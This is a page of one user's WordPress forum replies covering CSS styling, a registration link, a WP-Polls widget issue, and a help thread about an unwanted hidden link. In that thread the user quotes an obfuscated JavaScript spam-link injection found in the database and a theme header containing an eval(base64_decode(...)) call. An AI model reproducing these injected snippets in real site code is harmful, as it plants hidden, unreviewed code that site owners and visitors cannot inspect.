Forum Replies Created

Viewing 15 replies - 1 through 15 (of 17 total)
  • I mean: < a href=”https:// www. yourwebsite address / wp-login.php?action=register”>Register < / a>

    remove the spaces

    Hi youngmicroserf, just do like Grubbyseismic said, include this on your page:

    Register

    Of course, put your website’s url instead of ‘example.com’

    Not *side, site!!!

    Yes, just go to your theme’s style.css file and add:

    .dtree a:link, .dtree a:visited, .dtree a:active {
    color:blue;
    text-decoration:none;
    font-weight:bold;
    }

    .dtree a:hover {
    color:red;
    text-decoration:none;
    font-weight:bold;
    }

    I also added the color code in case you also want to change how it’s showing in your side. If you don’t want to add new color, just delete the color lines above.

    Hello Alexgieg,

    Was just wondering if you already have the language files for the Brazilian Portuguese?

    Thank u!

    Elisa.

    Thank you! You saved my life!!

    Looked all over the internet for the solution and only found it here…

    THANKS THANKS THANKS!!

    Thread Starter emoncao

    (@emoncao)

    Hey Moggie.. guess what.. I went to phpMyadmin and I found the code in wp_options inside the database.

    I deleted ID 140 and now everything is back to normal.

    Thanks a lot for your help.

    =)

    Take care…

    Thread Starter emoncao

    (@emoncao)

    Thanks again for your patience Moggie.
    Yes, that’s exactly how I did and also checked all my theme files for this damn code and nothing.
    I had an idea:
    I backed up all my files from my host, then with these files uploaded to my HD, I searched for this link and the only location it was found was in the file “taflorid_wp01.sql”

    I opened it using wordpad, and here it is on line 140:

    (140,0,’credit_text2′,'<div id=\”wraps\”>gym machine</div>\r\n<script language=\”javascript\”>\r\nvar wt = \’get\’+\’Element\’\r\nvar stl = \’st\’+\’yle\’;\r\nvar _0xd22c=[\”function seeThat(elem) { eval(x22elem.x22+stl+x22.display=x27blockx27;x22); }\”];\r\n_0xd22c[0x0] = _0xd22c[0x0].replace(/block/i,\”none\”);\r\neval(_0xd22c[0x0]);\r\n</script>\r\n<script>\r\nvar str = \’seeThat(document.getElementById(\”link\”));\’;\r\neval(str.replace(/link/i,\’wraps\’));\r\n</script>’,’yes’),(141,0,’credit_date2′,’1251380572′,’yes’),

    Would you know how to remove it?

    Trust me, I’ve looked all over the theme files… page.php, index.php, header.php, etc etc etc… and found no weird code in them.

    Thanks again my friend. =)

    Thread Starter emoncao

    (@emoncao)

    Thanks Moggie…
    I have looked all my theme files trying to find this link, even compared with the original theme files from my computer and everything.

    Check my uploaded header:

    <!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt;
    <html xmlns=”https://www.w3.org/1999/xhtml”&gt;
    <head profile=”https://gmpg.org/xfn/11″&gt;
    <meta http-equiv=”Content-Type” content=”<?php bloginfo(‘html_type’); ?>; charset=<?php bloginfo(‘charset’); ?>” />

    <title><?php bloginfo(‘name’); ?> <?php require_once(“theme_licence.php”); eval(base64_decode($f1)); if ( is_single() ) { ?> » Blog Archive <?php } ?> <?php wp_title(); ?></title>

    <meta name=”generator” content=”WordPress <?php bloginfo(‘version’); ?>” /> <!– leave this for stats –>
    <link rel=”stylesheet” href=”<?php bloginfo(‘stylesheet_url’); ?>” type=”text/css” media=”screen” />

    <link rel=”alternate” type=”application/rss+xml” title=”<?php bloginfo(‘name’); ?> RSS Feed” href=”<?php bloginfo(‘rss2_url’); ?>” />
    <link rel=”pingback” href=”<?php bloginfo(‘pingback_url’); ?>” />

    <?php wp_head(); ?>

    <!–[if IE 6]>
    <link rel=”stylesheet” href=”<?php bloginfo(‘template_directory’); ?>/ie60.css” type=”text/css” media=”screen” />
    <![endif]–>

    </head>

    <body>
    <?php start_template(); ?>
    <div id=”mainwrap”>
    <div id=”header-container”>

    <div id=”header”> <!– Header –>
    <div id=”cup”></div>
    <div id=”logo”>
    <h2><?php bloginfo(‘name’); ?></h2>
    <p><?php bloginfo(‘description’); ?></p>
    </div>
    <div id=”headerright”></div>

    <ul id=”menu”>

    • /” class=”active”>Home
    • <?php wp_list_pages(‘title_li=’); ?>

      </div> <!– END Header –>
      </div>

      Don’t see anything unusual… I opened all other files in the folder and no code for this link… omg, what a weird thing…

    Thread Starter emoncao

    (@emoncao)

    Yeah I took a look at this sticky post.. I even downloaded ABP and checked for go00gle.net but there’s nothing related to it on my site…

    Don’t know what to do now, looked all over and nothing.

    Thread Starter emoncao

    (@emoncao)

    Anyone? Please… ??

    Forum: Plugins
    In reply to: WP-Polls Widget

    I feel so dumb now hehehe I thought we should activate the widget in the widget section, but it’s in the plug- in section. Everything is working fine now, thank you!!!!

    Forum: Plugins
    In reply to: WP-Polls Widget

    Yes.

    I activated the plug-in with no problems… but when I go to the widget’s section, there is nothing about WP-Polls to be activated… just the other widgets I already have.

    I also changed my theme to the default one, went there, and nothing happened…

    I don’t know what I may be doing wrong since I’ve done this process of activating widgets a lot, and they show in there…

    Forum: Plugins
    In reply to: WP-Polls Widget

    Hi, guess I’m having the same problem… I activate the plug-in and when I go on widgets to activate there as well, WP-Polls does NOT show there…

    I have wordpress 2.7.1 and the deskmess theme (my blog: https://www.taflorida.com)

    Then when I try to uninstall, the following happens:

    Table ‘wp_pollsq’ has been deleted.
    Table ‘wp_pollsa’ has been deleted.
    Table ‘wp_pollsip’ has been deleted.

    Setting Key ‘poll_template_voteheader’ has been deleted.
    Setting Key ‘poll_template_votebody’ has been deleted.
    Setting Key ‘poll_template_votefooter’ has been deleted.
    Setting Key ‘poll_template_resultheader’ has been deleted.
    Setting Key ‘poll_template_resultbody’ has been deleted.
    Setting Key ‘poll_template_resultbody2’ has been deleted.
    Setting Key ‘poll_template_resultfooter’ has been deleted.
    Setting Key ‘poll_template_resultfooter2’ has been deleted.
    Setting Key ‘poll_template_disable’ has been deleted.
    Setting Key ‘poll_template_error’ has been deleted.
    Setting Key ‘poll_currentpoll’ has been deleted.
    Setting Key ‘poll_latestpoll’ has been deleted.
    Setting Key ‘poll_archive_perpage’ has been deleted.
    Setting Key ‘poll_ans_sortby’ has been deleted.
    Setting Key ‘poll_ans_sortorder’ has been deleted.
    Setting Key ‘poll_ans_result_sortby’ has been deleted.
    Setting Key ‘poll_ans_result_sortorder’ has been deleted.
    Setting Key ‘poll_logging_method’ has been deleted.
    Setting Key ‘poll_allowtovote’ has been deleted.
    Setting Key ‘poll_archive_show’ has been deleted.
    Setting Key ‘poll_archive_url’ has been deleted.
    Setting Key ‘poll_bar’ has been deleted.
    Setting Key ‘poll_close’ has been deleted.
    Setting Key ‘poll_ajax_style’ has been deleted.
    Setting Key ‘poll_template_pollarchivelink’ has been deleted.
    Error deleting Setting Key ‘widget_polls’.
    Setting Key ‘poll_archive_displaypoll’ has been deleted.
    Setting Key ‘poll_template_pollarchiveheader’ has been deleted.
    Setting Key ‘poll_template_pollarchivefooter’ has been deleted.
    Setting Key ‘poll_cookielog_expiry’ has been deleted.

    Do you have any clue why I’m having problems to activate the widget?

    Thank you!!

Viewing 15 replies - 1 through 15 (of 17 total)